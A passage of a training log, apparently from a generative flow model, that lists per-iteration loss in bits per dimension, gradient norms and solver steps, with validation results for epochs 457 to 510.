Error 0.0000(0.0000) Steps 446(442.53) | Grad Norm 0.1075(0.0809) | Total Time 10.00(10.00)\nIter 5174 | Time 40.3360(40.3779) | Bit/dim 1.0731(1.0768) | Xent 0.0000(0.0000) | Loss 1.0731(1.0768) | Error 0.0000(0.0000) Steps 440(442.45) | Grad Norm 0.0670(0.0805) | Total Time 10.00(10.00)\nIter 5175 | Time 40.0905(40.3693) | Bit/dim 1.0753(1.0767) | Xent 0.0000(0.0000) | Loss 1.0753(1.0767) | Error 0.0000(0.0000) Steps 446(442.56) | Grad Norm 0.0702(0.0802) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0457 | Time 14.8440, Epoch Time 307.8577(310.1060), Bit/dim 1.0716(best: 1.0711), Xent 0.0000, Loss 1.0716, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5176 | Time 39.7408(40.3504) | Bit/dim 1.0788(1.0768) | Xent 0.0000(0.0000) | Loss 1.0788(1.0768) | Error 0.0000(0.0000) Steps 446(442.66) | Grad Norm 0.0603(0.0796) | Total Time 10.00(10.00)\nIter 5177 | Time 41.9020(40.3970) | Bit/dim 1.0783(1.0768) | Xent 0.0000(0.0000) | Loss 1.0783(1.0768) | Error 0.0000(0.0000) Steps 446(442.76) | Grad Norm 0.1101(0.0805) | Total Time 10.00(10.00)\nIter 5178 | Time 40.6001(40.4031) | Bit/dim 1.0800(1.0769) | Xent 0.0000(0.0000) | Loss 1.0800(1.0769) | Error 0.0000(0.0000) Steps 446(442.86) | Grad Norm 0.0583(0.0798) | Total Time 10.00(10.00)\nIter 5179 | Time 39.9001(40.3880) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 446(442.96) | Grad Norm 0.0688(0.0795) | Total Time 10.00(10.00)\nIter 5180 | Time 41.8493(40.4318) | Bit/dim 1.0747(1.0768) | Xent 0.0000(0.0000) | Loss 1.0747(1.0768) | Error 0.0000(0.0000) Steps 440(442.87) | Grad Norm 0.0816(0.0796) | Total Time 10.00(10.00)\nIter 5181 | Time 42.0564(40.4806) | Bit/dim 1.0729(1.0767) | Xent 0.0000(0.0000) | Loss 1.0729(1.0767) | Error 0.0000(0.0000) Steps 446(442.96) | Grad Norm 0.0722(0.0794) | Total Time 10.00(10.00)\nIter 5182 | Time 40.9104(40.4935) | Bit/dim 1.0723(1.0766) | Xent 0.0000(0.0000) | Loss 1.0723(1.0766) | Error 0.0000(0.0000) Steps 440(442.87) | Grad Norm 0.0832(0.0795) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0458 | Time 14.8726, Epoch Time 314.6576(310.2426), Bit/dim 1.0711(best: 1.0711), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5183 | Time 40.4145(40.4911) | Bit/dim 1.0753(1.0765) | Xent 0.0000(0.0000) | Loss 1.0753(1.0765) | Error 0.0000(0.0000) Steps 440(442.79) | Grad Norm 0.0817(0.0795) | Total Time 10.00(10.00)\nIter 5184 | Time 39.4902(40.4611) | Bit/dim 1.0730(1.0764) | Xent 0.0000(0.0000) | Loss 1.0730(1.0764) | Error 0.0000(0.0000) Steps 440(442.70) | Grad Norm 0.0621(0.0790) | Total Time 10.00(10.00)\nIter 5185 | Time 38.9384(40.4154) | Bit/dim 1.0758(1.0764) | Xent 0.0000(0.0000) | Loss 1.0758(1.0764) | Error 0.0000(0.0000) Steps 440(442.62) | Grad Norm 0.0628(0.0785) | Total Time 10.00(10.00)\nIter 5186 | Time 39.1061(40.3761) | Bit/dim 1.0769(1.0764) | Xent 0.0000(0.0000) | Loss 1.0769(1.0764) | Error 0.0000(0.0000) Steps 440(442.54) | Grad Norm 0.0908(0.0789) | Total Time 10.00(10.00)\nIter 5187 | Time 38.8842(40.3313) | Bit/dim 1.0816(1.0766) | Xent 0.0000(0.0000) | Loss 1.0816(1.0766) | Error 0.0000(0.0000) Steps 446(442.65) | Grad Norm 0.0699(0.0786) | Total Time 10.00(10.00)\nIter 5188 | Time 41.2929(40.3602) | Bit/dim 1.0741(1.0765) | Xent 0.0000(0.0000) | Loss 1.0741(1.0765) | Error 0.0000(0.0000) Steps 446(442.75) | Grad Norm 0.0560(0.0779) | Total Time 10.00(10.00)\nIter 5189 | Time 41.7675(40.4024) | Bit/dim 1.0772(1.0765) | Xent 0.0000(0.0000) | Loss 1.0772(1.0765) | Error 0.0000(0.0000) Steps 440(442.66) | Grad Norm 0.0619(0.0775) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0459 | Time 14.9091, Epoch Time 307.1357(310.1494), Bit/dim 1.0712(best: 1.0711), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5190 | Time 41.2381(40.4275) | Bit/dim 1.0729(1.0764) | Xent 0.0000(0.0000) | Loss 1.0729(1.0764) | Error 0.0000(0.0000) Steps 440(442.58) | Grad Norm 0.1065(0.0783) | Total Time 10.00(10.00)\nIter 5191 | Time 41.7265(40.4664) | Bit/dim 1.0805(1.0765) | Xent 0.0000(0.0000) | Loss 1.0805(1.0765) | Error 0.0000(0.0000) Steps 446(442.69) | Grad Norm 0.0510(0.0775) | Total Time 10.00(10.00)\nIter 5192 | Time 40.3864(40.4640) | Bit/dim 1.0723(1.0764) | Xent 0.0000(0.0000) | Loss 1.0723(1.0764) | Error 0.0000(0.0000) Steps 446(442.79) | Grad Norm 0.0874(0.0778) | Total Time 10.00(10.00)\nIter 5193 | Time 39.5209(40.4358) | Bit/dim 1.0784(1.0765) | Xent 0.0000(0.0000) | Loss 1.0784(1.0765) | Error 0.0000(0.0000) Steps 440(442.70) | Grad Norm 0.0884(0.0781) | Total Time 10.00(10.00)\nIter 5194 | Time 38.5992(40.3807) | Bit/dim 1.0752(1.0764) | Xent 0.0000(0.0000) | Loss 1.0752(1.0764) | Error 0.0000(0.0000) Steps 440(442.62) | Grad Norm 0.0676(0.0778) | Total Time 10.00(10.00)\nIter 5195 | Time 39.7086(40.3605) | Bit/dim 1.0745(1.0764) | Xent 0.0000(0.0000) | Loss 1.0745(1.0764) | Error 0.0000(0.0000) Steps 446(442.72) | Grad Norm 0.0811(0.0779) | Total Time 10.00(10.00)\nIter 5196 | Time 41.3600(40.3905) | Bit/dim 1.0786(1.0764) | Xent 0.0000(0.0000) | Loss 1.0786(1.0764) | Error 0.0000(0.0000) Steps 440(442.64) | Grad Norm 0.0642(0.0775) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0460 | Time 14.7616, Epoch Time 310.0542(310.1465), Bit/dim 1.0714(best: 1.0711), Xent 0.0000, Loss 1.0714, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5197 | Time 40.4559(40.3924) | Bit/dim 1.0750(1.0764) | Xent 0.0000(0.0000) | Loss 1.0750(1.0764) | Error 0.0000(0.0000) Steps 440(442.56) | Grad Norm 0.0757(0.0774) | Total Time 10.00(10.00)\nIter 5198 | Time 41.4122(40.4230) | Bit/dim 1.0802(1.0765) | Xent 0.0000(0.0000) | Loss 1.0802(1.0765) | Error 0.0000(0.0000) Steps 446(442.67) | Grad Norm 0.0670(0.0771) | Total Time 10.00(10.00)\nIter 5199 | Time 39.0452(40.3817) | Bit/dim 1.0761(1.0765) | Xent 0.0000(0.0000) | Loss 1.0761(1.0765) | Error 0.0000(0.0000) Steps 440(442.59) | Grad Norm 0.0591(0.0766) | Total Time 10.00(10.00)\nIter 5200 | Time 40.1472(40.3747) | Bit/dim 1.0805(1.0766) | Xent 0.0000(0.0000) | Loss 1.0805(1.0766) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.1112(0.0776) | Total Time 10.00(10.00)\nIter 5201 | Time 40.7721(40.3866) | Bit/dim 1.0740(1.0765) | Xent 0.0000(0.0000) | Loss 1.0740(1.0765) | Error 0.0000(0.0000) Steps 446(442.61) | Grad Norm 0.0602(0.0771) | Total Time 10.00(10.00)\nIter 5202 | Time 41.5559(40.4217) | Bit/dim 1.0727(1.0764) | Xent 0.0000(0.0000) | Loss 1.0727(1.0764) | Error 0.0000(0.0000) Steps 446(442.71) | Grad Norm 0.0554(0.0765) | Total Time 10.00(10.00)\nIter 5203 | Time 42.7653(40.4920) | Bit/dim 1.0766(1.0764) | Xent 0.0000(0.0000) | Loss 1.0766(1.0764) | Error 0.0000(0.0000) Steps 446(442.81) | Grad Norm 0.0854(0.0767) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0461 | Time 14.9113, Epoch Time 313.6441(310.2514), Bit/dim 1.0706(best: 1.0711), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5204 | Time 39.6084(40.4655) | Bit/dim 1.0712(1.0763) | Xent 0.0000(0.0000) | Loss 1.0712(1.0763) | Error 0.0000(0.0000) Steps 440(442.73) | Grad Norm 0.0743(0.0766) | Total Time 10.00(10.00)\nIter 5205 | Time 40.3098(40.4608) | Bit/dim 1.0821(1.0764) | Xent 0.0000(0.0000) | Loss 1.0821(1.0764) | Error 0.0000(0.0000) Steps 440(442.65) | Grad Norm 0.0608(0.0762) | Total Time 10.00(10.00)\nIter 5206 | Time 39.7130(40.4384) | Bit/dim 1.0771(1.0765) | Xent 0.0000(0.0000) | Loss 1.0771(1.0765) | Error 0.0000(0.0000) Steps 446(442.75) | Grad Norm 0.0884(0.0765) | Total Time 10.00(10.00)\nIter 5207 | Time 40.0072(40.4254) | Bit/dim 1.0771(1.0765) | Xent 0.0000(0.0000) | Loss 1.0771(1.0765) | Error 0.0000(0.0000) Steps 440(442.66) | Grad Norm 0.0721(0.0764) | Total Time 10.00(10.00)\nIter 5208 | Time 42.0931(40.4755) | Bit/dim 1.0723(1.0764) | Xent 0.0000(0.0000) | Loss 1.0723(1.0764) | Error 0.0000(0.0000) Steps 440(442.58) | Grad Norm 0.0741(0.0763) | Total Time 10.00(10.00)\nIter 5209 | Time 40.2741(40.4694) | Bit/dim 1.0733(1.0763) | Xent 0.0000(0.0000) | Loss 1.0733(1.0763) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.0582(0.0758) | Total Time 10.00(10.00)\nIter 5210 | Time 39.1020(40.4284) | Bit/dim 1.0792(1.0764) | Xent 0.0000(0.0000) | Loss 1.0792(1.0764) | Error 0.0000(0.0000) Steps 440(442.43) | Grad Norm 0.0869(0.0761) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0462 | Time 15.0026, Epoch Time 308.4534(310.1975), Bit/dim 1.0716(best: 1.0706), Xent 0.0000, Loss 1.0716, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5211 | Time 39.7311(40.4075) | Bit/dim 1.0772(1.0764) | Xent 0.0000(0.0000) | Loss 1.0772(1.0764) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0646(0.0758) | Total Time 10.00(10.00)\nIter 5212 | Time 38.9679(40.3643) | Bit/dim 1.0774(1.0764) | Xent 0.0000(0.0000) | Loss 1.0774(1.0764) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.0966(0.0764) | Total Time 10.00(10.00)\nIter 5213 | Time 40.5426(40.3696) | Bit/dim 1.0741(1.0763) | Xent 0.0000(0.0000) | Loss 1.0741(1.0763) | Error 0.0000(0.0000) Steps 446(442.40) | Grad Norm 0.0619(0.0760) | Total Time 10.00(10.00)\nIter 5214 | Time 41.9483(40.4170) | Bit/dim 1.0749(1.0763) | Xent 0.0000(0.0000) | Loss 1.0749(1.0763) | Error 0.0000(0.0000) Steps 440(442.33) | Grad Norm 0.0858(0.0763) | Total Time 10.00(10.00)\nIter 5215 | Time 39.4759(40.3888) | Bit/dim 1.0761(1.0763) | Xent 0.0000(0.0000) | Loss 1.0761(1.0763) | Error 0.0000(0.0000) Steps 446(442.44) | Grad Norm 0.1346(0.0780) | Total Time 10.00(10.00)\nIter 5216 | Time 39.9341(40.3751) | Bit/dim 1.0788(1.0764) | Xent 0.0000(0.0000) | Loss 1.0788(1.0764) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0953(0.0785) | Total Time 10.00(10.00)\nIter 5217 | Time 41.9022(40.4209) | Bit/dim 1.0750(1.0763) | Xent 0.0000(0.0000) | Loss 1.0750(1.0763) | Error 0.0000(0.0000) Steps 446(442.47) | Grad Norm 0.0702(0.0783) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0463 | Time 14.8826, Epoch Time 309.8397(310.1868), Bit/dim 1.0709(best: 1.0706), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5218 | Time 41.2565(40.4460) | Bit/dim 1.0782(1.0764) | Xent 0.0000(0.0000) | Loss 1.0782(1.0764) | Error 0.0000(0.0000) Steps 440(442.40) | Grad Norm 0.1011(0.0790) | Total Time 10.00(10.00)\nIter 5219 | Time 42.0132(40.4930) | Bit/dim 1.0750(1.0763) | Xent 0.0000(0.0000) | Loss 1.0750(1.0763) | Error 0.0000(0.0000) Steps 440(442.33) | Grad Norm 0.1186(0.0802) | Total Time 10.00(10.00)\nIter 5220 | Time 40.4381(40.4914) | Bit/dim 1.0719(1.0762) | Xent 0.0000(0.0000) | Loss 1.0719(1.0762) | Error 0.0000(0.0000) Steps 440(442.26) | Grad Norm 0.0867(0.0804) | Total Time 10.00(10.00)\nIter 5221 | Time 40.0876(40.4793) | Bit/dim 1.0758(1.0762) | Xent 0.0000(0.0000) | Loss 1.0758(1.0762) | Error 0.0000(0.0000) Steps 446(442.37) | Grad Norm 0.0779(0.0803) | Total Time 10.00(10.00)\nIter 5222 | Time 40.4877(40.4795) | Bit/dim 1.0762(1.0762) | Xent 0.0000(0.0000) | Loss 1.0762(1.0762) | Error 0.0000(0.0000) Steps 440(442.30) | Grad Norm 0.1260(0.0817) | Total Time 10.00(10.00)\nIter 5223 | Time 41.6267(40.5139) | Bit/dim 1.0758(1.0762) | Xent 0.0000(0.0000) | Loss 1.0758(1.0762) | Error 0.0000(0.0000) Steps 446(442.41) | Grad Norm 0.1040(0.0823) | Total Time 10.00(10.00)\nIter 5224 | Time 39.0718(40.4707) | Bit/dim 1.0765(1.0762) | Xent 0.0000(0.0000) | Loss 1.0765(1.0762) | Error 0.0000(0.0000) Steps 440(442.34) | Grad Norm 0.1217(0.0835) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0464 | Time 14.9087, Epoch Time 312.3863(310.2528), Bit/dim 1.0711(best: 1.0706), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.\nIter 5225 | Time 38.7320(40.4185) | Bit/dim 1.0790(1.0763) | Xent 0.0000(0.0000) | Loss 1.0790(1.0763) | Error 0.0000(0.0000) Steps 440(442.27) | Grad Norm 0.0489(0.0825) | Total Time 10.00(10.00)\nIter 5226 | Time 41.6483(40.4554) | Bit/dim 1.0767(1.0763) | Xent 0.0000(0.0000) | Loss 1.0767(1.0763) | Error 0.0000(0.0000) Steps 440(442.20) | Grad Norm 0.1016(0.0830) | Total Time 10.00(10.00)\nIter 5227 | Time 42.1392(40.5059) | Bit/dim 1.0750(1.0763) | Xent 0.0000(0.0000) | Loss 1.0750(1.0763) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0980(0.0835) | Total Time 10.00(10.00)\nIter 5228 | Time 41.4990(40.5357) | Bit/dim 1.0770(1.0763) | Xent 0.0000(0.0000) | Loss 1.0770(1.0763) | Error 0.0000(0.0000) Steps 446(442.25) | Grad Norm 0.0752(0.0832) | Total Time 10.00(10.00)\nIter 5229 | Time 41.3522(40.5602) | Bit/dim 1.0758(1.0763) | Xent 0.0000(0.0000) | Loss 1.0758(1.0763) | Error 0.0000(0.0000) Steps 440(442.18) | Grad Norm 0.0715(0.0829) | Total Time 10.00(10.00)\nIter 5230 | Time 39.6940(40.5342) | Bit/dim 1.0750(1.0762) | Xent 0.0000(0.0000) | Loss 1.0750(1.0762) | Error 0.0000(0.0000) Steps 446(442.30) | Grad Norm 0.0586(0.0822) | Total Time 10.00(10.00)\nIter 5231 | Time 40.9046(40.5453) | Bit/dim 1.0750(1.0762) | Xent 0.0000(0.0000) | Loss 1.0750(1.0762) | Error 0.0000(0.0000) Steps 440(442.23) | Grad Norm 0.1210(0.0833) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0465 | Time 14.8502, Epoch Time 313.1535(310.3398), Bit/dim 1.0707(best: 1.0706), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5232 | Time 39.1290(40.5028) | Bit/dim 1.0760(1.0762) | Xent 0.0000(0.0000) | Loss 1.0760(1.0762) | Error 0.0000(0.0000) Steps 440(442.16) | Grad Norm 0.0507(0.0823) | Total Time 10.00(10.00)\nIter 5233 | Time 41.7095(40.5390) | Bit/dim 1.0782(1.0762) | Xent 0.0000(0.0000) | Loss 1.0782(1.0762) | Error 0.0000(0.0000) Steps 440(442.10) | Grad Norm 0.0752(0.0821) | Total Time 10.00(10.00)\nIter 5234 | Time 41.6052(40.5710) | Bit/dim 1.0747(1.0762) | Xent 0.0000(0.0000) | Loss 1.0747(1.0762) | Error 0.0000(0.0000) Steps 440(442.03) | Grad Norm 0.0726(0.0818) | Total Time 10.00(10.00)\nIter 5235 | Time 40.4893(40.5686) | Bit/dim 1.0822(1.0764) | Xent 0.0000(0.0000) | Loss 1.0822(1.0764) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.1771(0.0847) | Total Time 10.00(10.00)\nIter 5236 | Time 39.4491(40.5350) | Bit/dim 1.0729(1.0763) | Xent 0.0000(0.0000) | Loss 1.0729(1.0763) | Error 0.0000(0.0000) Steps 440(441.91) | Grad Norm 0.0651(0.0841) | Total Time 10.00(10.00)\nIter 5237 | Time 39.2683(40.4970) | Bit/dim 1.0769(1.0763) | Xent 0.0000(0.0000) | Loss 1.0769(1.0763) | Error 0.0000(0.0000) Steps 446(442.04) | Grad Norm 0.0980(0.0845) | Total Time 10.00(10.00)\nIter 5238 | Time 41.2818(40.5205) | Bit/dim 1.0713(1.0761) | Xent 0.0000(0.0000) | Loss 1.0713(1.0761) | Error 0.0000(0.0000) Steps 446(442.15) | Grad Norm 0.1488(0.0865) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0466 | Time 15.0413, Epoch Time 310.5079(310.3448), Bit/dim 1.0710(best: 1.0706), Xent 0.0000, Loss 1.0710, Error 1.0000(best: inf)\n===> Using batch size 8000. 
Total 7 iterations/epoch.
Iter 5239 | Time 40.2253(40.5117) | Bit/dim 1.0813(1.0763) | Xent 0.0000(0.0000) | Loss 1.0813(1.0763) | Error 0.0000(0.0000) Steps 446(442.27) | Grad Norm 0.0557(0.0855) | Total Time 10.00(10.00)
Iter 5240 | Time 39.4263(40.4791) | Bit/dim 1.0735(1.0762) | Xent 0.0000(0.0000) | Loss 1.0735(1.0762) | Error 0.0000(0.0000) Steps 440(442.20) | Grad Norm 0.1135(0.0864) | Total Time 10.00(10.00)
Iter 5241 | Time 41.1161(40.4982) | Bit/dim 1.0746(1.0762) | Xent 0.0000(0.0000) | Loss 1.0746(1.0762) | Error 0.0000(0.0000) Steps 440(442.14) | Grad Norm 0.0596(0.0856) | Total Time 10.00(10.00)
Iter 5242 | Time 41.9630(40.5422) | Bit/dim 1.0748(1.0761) | Xent 0.0000(0.0000) | Loss 1.0748(1.0761) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0674(0.0850) | Total Time 10.00(10.00)
Iter 5243 | Time 40.4541(40.5395) | Bit/dim 1.0727(1.0760) | Xent 0.0000(0.0000) | Loss 1.0727(1.0760) | Error 0.0000(0.0000) Steps 446(442.19) | Grad Norm 0.0628(0.0844) | Total Time 10.00(10.00)
Iter 5244 | Time 40.5763(40.5406) | Bit/dim 1.0770(1.0760) | Xent 0.0000(0.0000) | Loss 1.0770(1.0760) | Error 0.0000(0.0000) Steps 446(442.30) | Grad Norm 0.0665(0.0838) | Total Time 10.00(10.00)
Iter 5245 | Time 41.3391(40.5646) | Bit/dim 1.0789(1.0761) | Xent 0.0000(0.0000) | Loss 1.0789(1.0761) | Error 0.0000(0.0000) Steps 440(442.23) | Grad Norm 0.0693(0.0834) | Total Time 10.00(10.00)
validating...
Epoch 0467 | Time 14.6494, Epoch Time 312.4349(310.4075), Bit/dim 1.0711(best: 1.0706), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)
[epochs 0468-0510: each epoch summary below was preceded by the "===> Using batch size 8000. Total 7 iterations/epoch." banner, seven per-iteration lines in the format above (Iter 5246-5546), and a "validating..." pass; only the epoch summaries are kept here]
Epoch 0468 | Time 14.9079, Epoch Time 308.6603(310.3551), Bit/dim 1.0705(best: 1.0706), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)
Epoch 0469 | Time 14.7316, Epoch Time 313.4270(310.4473), Bit/dim 1.0709(best: 1.0705), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)
Epoch 0470 | Time 14.8345, Epoch Time 311.6646(310.4838), Bit/dim 1.0709(best: 1.0705), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)
Epoch 0471 | Time 14.8883, Epoch Time 310.1920(310.4750), Bit/dim 1.0705(best: 1.0705), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)
Epoch 0472 | Time 15.1117, Epoch Time 313.5438(310.5671), Bit/dim 1.0707(best: 1.0705), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)
Epoch 0473 | Time 15.0386, Epoch Time 310.0613(310.5519), Bit/dim 1.0712(best: 1.0705), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)
Epoch 0474 | Time 15.0040, Epoch Time 309.1928(310.5111), Bit/dim 1.0710(best: 1.0705), Xent 0.0000, Loss 1.0710, Error 1.0000(best: inf)
Epoch 0475 | Time 14.7939, Epoch Time 313.2932(310.5946), Bit/dim 1.0709(best: 1.0705), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)
Epoch 0476 | Time 14.9803, Epoch Time 311.2121(310.6131), Bit/dim 1.0705(best: 1.0705), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)
Epoch 0477 | Time 14.8776, Epoch Time 308.3316(310.5447), Bit/dim 1.0707(best: 1.0705), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)
Epoch 0478 | Time 14.7956, Epoch Time 313.1077(310.6216), Bit/dim 1.0708(best: 1.0705), Xent 0.0000, Loss 1.0708, Error 1.0000(best: inf)
Epoch 0479 | Time 15.1347, Epoch Time 312.4300(310.6758), Bit/dim 1.0703(best: 1.0705), Xent 0.0000, Loss 1.0703, Error 1.0000(best: inf)
Epoch 0480 | Time 15.1040, Epoch Time 312.4846(310.7301), Bit/dim 1.0707(best: 1.0703), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)
Epoch 0481 | Time 14.9759, Epoch Time 308.3272(310.6580), Bit/dim 1.0707(best: 1.0703), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)
Epoch 0482 | Time 15.0070, Epoch Time 314.1069(310.7615), Bit/dim 1.0711(best: 1.0703), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)
Epoch 0483 | Time 15.0515, Epoch Time 311.9444(310.7970), Bit/dim 1.0709(best: 1.0703), Xent 0.0000, Loss 1.0709, Error 1.0000(best: inf)
Epoch 0484 | Time 15.2820, Epoch Time 308.9097(310.7403), Bit/dim 1.0711(best: 1.0703), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)
Epoch 0485 | Time 15.0067, Epoch Time 305.8891(310.5948), Bit/dim 1.0704(best: 1.0703), Xent 0.0000, Loss 1.0704, Error 1.0000(best: inf)
Epoch 0486 | Time 15.0123, Epoch Time 309.8866(310.5736), Bit/dim 1.0707(best: 1.0703), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)
Epoch 0487 | Time 15.0900, Epoch Time 310.3451(310.5667), Bit/dim 1.0706(best: 1.0703), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)
Epoch 0488 | Time 14.8987, Epoch Time 315.2446(310.7070), Bit/dim 1.0706(best: 1.0703), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)
Epoch 0489 | Time 14.9054, Epoch Time 307.1891(310.6015), Bit/dim 1.0702(best: 1.0703), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)
Epoch 0490 | Time 15.2516, Epoch Time 307.1399(310.4977), Bit/dim 1.0705(best: 1.0702), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)
Epoch 0491 | Time 15.0689, Epoch Time 307.2274(310.3995), Bit/dim 1.0706(best: 1.0702), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)
Epoch 0492 | Time 15.0266, Epoch Time 311.9734(310.4468), Bit/dim 1.0701(best: 1.0702), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)
Epoch 0493 | Time 14.9795, Epoch Time 313.6108(310.5417), Bit/dim 1.0702(best: 1.0701), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)
Epoch 0494 | Time 15.0528, Epoch Time 310.3135(310.5348), Bit/dim 1.0701(best: 1.0701), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)
Epoch 0495 | Time 15.1484, Epoch Time 310.1574(310.5235), Bit/dim 1.0700(best: 1.0701), Xent 0.0000, Loss 1.0700, Error 1.0000(best: inf)
Epoch 0496 | Time 15.0401, Epoch Time 309.7803(310.5012), Bit/dim 1.0706(best: 1.0700), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)
Epoch 0497 | Time 15.1730, Epoch Time 312.5887(310.5638), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)
Epoch 0498 | Time 15.0502, Epoch Time 313.2645(310.6449), Bit/dim 1.0700(best: 1.0700), Xent 0.0000, Loss 1.0700, Error 1.0000(best: inf)
Epoch 0499 | Time 14.9515, Epoch Time 309.4141(310.6079), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)
Epoch 0500 | Time 14.9950, Epoch Time 313.8471(310.7051), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)
Epoch 0501 | Time 14.9761, Epoch Time 312.3253(310.7537), Bit/dim 1.0700(best: 1.0700), Xent 0.0000, Loss 1.0700, Error 1.0000(best: inf)
Epoch 0502 | Time 14.9519, Epoch Time 317.5604(310.9579), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)
Epoch 0503 | Time 15.0404, Epoch Time 309.1715(310.9043), Bit/dim 1.0699(best: 1.0700), Xent 0.0000, Loss 1.0699, Error 1.0000(best: inf)
Epoch 0504 | Time 14.9159, Epoch Time 306.1499(310.7617), Bit/dim 1.0701(best: 1.0699), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)
Epoch 0505 | Time 15.0270, Epoch Time 309.9020(310.7359), Bit/dim 1.0699(best: 1.0699), Xent 0.0000, Loss 1.0699, Error 1.0000(best: inf)
Epoch 0506 | Time 15.2103, Epoch Time 316.1837(310.8993), Bit/dim 1.0697(best: 1.0699), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)
Epoch 0507 | Time 14.9319, Epoch Time 315.6765(311.0427), Bit/dim 1.0701(best: 1.0697), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)
Epoch 0508 | Time 15.2935, Epoch Time 310.0544(311.0130), Bit/dim 1.0701(best: 1.0697), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)
Epoch 0509 | Time 15.4240, Epoch Time 310.9351(311.0107), Bit/dim 1.0706(best: 1.0697), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)
Epoch 0510 | Time 15.1003, Epoch Time 314.5092(311.1156), Bit/dim 1.0698(best: 1.0697), Xent 0.0000, Loss 1.0698, Error 1.0000(best: inf)
===> Using batch size 8000.
Total 7 iterations/epoch.\nIter 5547 | Time 40.3114(40.6783) | Bit/dim 1.0762(1.0752) | Xent 0.0000(0.0000) | Loss 1.0762(1.0752) | Error 0.0000(0.0000) Steps 446(448.45) | Grad Norm 0.0671(0.0962) | Total Time 10.00(10.00)\nIter 5548 | Time 39.9333(40.6560) | Bit/dim 1.0755(1.0752) | Xent 0.0000(0.0000) | Loss 1.0755(1.0752) | Error 0.0000(0.0000) Steps 446(448.37) | Grad Norm 0.0824(0.0958) | Total Time 10.00(10.00)\nIter 5549 | Time 41.9729(40.6955) | Bit/dim 1.0759(1.0752) | Xent 0.0000(0.0000) | Loss 1.0759(1.0752) | Error 0.0000(0.0000) Steps 446(448.30) | Grad Norm 0.0727(0.0951) | Total Time 10.00(10.00)\nIter 5550 | Time 40.2704(40.6827) | Bit/dim 1.0721(1.0751) | Xent 0.0000(0.0000) | Loss 1.0721(1.0751) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.1212(0.0959) | Total Time 10.00(10.00)\nIter 5551 | Time 41.3326(40.7022) | Bit/dim 1.0733(1.0750) | Xent 0.0000(0.0000) | Loss 1.0733(1.0750) | Error 0.0000(0.0000) Steps 452(448.35) | Grad Norm 0.0940(0.0958) | Total Time 10.00(10.00)\nIter 5552 | Time 40.2491(40.6886) | Bit/dim 1.0719(1.0750) | Xent 0.0000(0.0000) | Loss 1.0719(1.0750) | Error 0.0000(0.0000) Steps 446(448.28) | Grad Norm 0.0810(0.0954) | Total Time 